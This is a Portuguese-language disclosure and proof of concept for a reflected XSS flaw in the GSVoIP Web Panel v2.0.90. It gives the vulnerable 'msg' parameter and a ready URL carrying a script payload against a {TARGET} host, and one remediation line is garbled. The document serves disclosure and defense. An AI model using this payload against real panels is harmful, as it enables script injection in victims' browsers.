
Prova de conceito de XSS refletido para CVE-2025-69606 no GSVoIP Web Panel v2.0.90. Demonstra execução remota não autenticada de JavaScript através do parâmetro `msg` não sanitizado.
Severidade: Média | CWE: CWE-79 | Autenticação Necessária: Não | Vetor: Remoto
Uma vulnerabilidade de Cross-Site Scripting (XSS) Refletido foi identificada no Painel Web GSVoIP (v2.0.90). O parâmetro msg do endpoint de erro não sanitiza a entrada controlada pelo usuário antes de refleti-la na resposta HTML, permitindo a execução arbitrária de JavaScript no navegador da vítima.
| Campo | Detalhes |
|---|---|
| Produto | Painel Web GSVoIP |
| Versão | 2.0.90 (provavelmente versões anteriores) |
| Fornecedor | Solutions VoIP (GS Solutions) |
| CWE | CWE-79 — Cross-Site Scripting |
| Vetor de Ataque | Remoto / Rede |
| Autenticação | Não requerida |
GET /painel/gateways.php/error?msg=<payload>
O parâmetro msg é refletido diretamente na resposta HTML sem sanitização ou codificação de saída.
https://{TARGET}/painel/gateways.php/error?msg=%3Cscript%3Ealert(1)%3C%2Fscript%3E
Decodificado:
<script>alert(1)</script>
Quando a URL manipulada é acessada, o payload injetado é executado no navegador da vítima:
alert(1)
msg.script-src restritivas.| Etapa | Evento |
|---|---|
| 1 | Vulnerabilidade descoberta e reportada por Luiz Eduardo |
| 2 | CVE atribuído: CVE-2025-69606 |
| 3 | Divulgação pública |
Descoberta e reportada por Luiz Eduardo
CVE-2025-69606 · CWE-79 · Painel Web GSVoIP v2.0.90